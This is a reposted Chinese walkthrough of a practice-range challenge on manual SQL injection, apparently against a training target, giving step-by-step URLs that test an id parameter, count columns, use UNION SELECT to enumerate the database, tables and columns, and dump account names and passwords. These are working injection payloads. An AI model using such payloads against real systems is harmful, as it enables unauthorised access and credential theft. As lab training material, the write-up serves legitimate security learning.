IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> PHP知识库 -> 墨者靶场 SQL手工注入漏洞测试【MySQL数据库】 -> 正文阅读

[PHP知识库]墨者靶场 SQL手工注入漏洞测试【MySQL数据库】

墨者靶场 SQL手工注入漏洞测试(MySQL数据库)

  1. 首先访问链接:可以看到是要找到登陆的用户和密码

  2. 找到是否有注入点:124.70.64.48:47756/new_list.php?id=1
    可以看到显示的页面在这里插入图片描述
    3. 124.70.64.48:47756/new_list.php?id=1 and 1=1 页面显示正常
    在这里插入图片描述

  3. 124.70.64.48:47756/new_list.php?id=1 and 1=2 页面显示异常 可以判断id是存在注入点的
    在这里插入图片描述

  4. 查找数量:124.70.64.48:47756/new_list.php?id=1 order by 204 尝试1234都是正常的,到了5就发现了异常,所以可以确定数量是4

  5. 手工注入使用union联合查询:
    124.70.64.48:47756/new_list.php?id=-1 union select 1,2,3,4
    很容易就可以看到页面中的2和3,就可以猜测是这两个地方有注入
    在这里插入图片描述

  6. 124.70.64.48:47756/new_list.php?id=-1 union select 1,database(),3,4(将2的地方改成查询数据库试试)发现找到了数据库的名称
    在这里插入图片描述

  7. 改3:124.70.64.48:47756/new_list.php?id=-1 union select 1,database(),version(),4
    可以看到数据库的版本号了在这里插入图片描述
    同理查询数据库用户和数据库类型:可以看到是root用户名和Linux系统在这里插入图片描述

利用information_schema数据库查询:几乎包含所有的表名等信息;
information_schema.tables:记录所有表名信息的表
information_schema.conlumus:记录所有列名信息的表

9.查询表名:
124.70.64.48:47756/new_list.php id=-1 union select 1,table_name,3,4 from information_schema.tables where table_schema=‘mozhe_Discuz_StormGroup’在这里插入图片描述
10. 查询表下的列名:124.70.64.48:47756/new_list.php?id=-1 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name=‘StormGroup_member’在这里插入图片描述
11.查询指定数据:
124.70.64.48:47756/new_list.php?id=-1 union select 1,name,password,4 from StormGroup_member
在这里插入图片描述
124.70.64.48:47756/new_list.php?id=-1 union select 1,name,password,4 from StormGroup_member limit 1,1 有两个账号,在最后加limit 0,1 尝试到1,1 2,1最后发现有两个mozhe账号密码在这里插入图片描述
12. 最后成功登录:
在这里插入图片描述

  PHP知识库 最新文章
Laravel 下实现 Google 2fa 验证
UUCTF WP
DASCTF10月 web
XAMPP任意命令执行提升权限漏洞(CVE-2020-
[GYCTF2020]Easyphp
iwebsec靶场 代码执行关卡通关笔记
多个线程同步执行,多个线程依次执行,多个
php 没事记录下常用方法 (TP5.1)
php之jwt
2021-09-18
上一篇文章      下一篇文章      查看所有文章
加:2022-04-28 11:37:02  更:2022-04-28 11:37:08 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 -2024/11/15 1:14:17-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码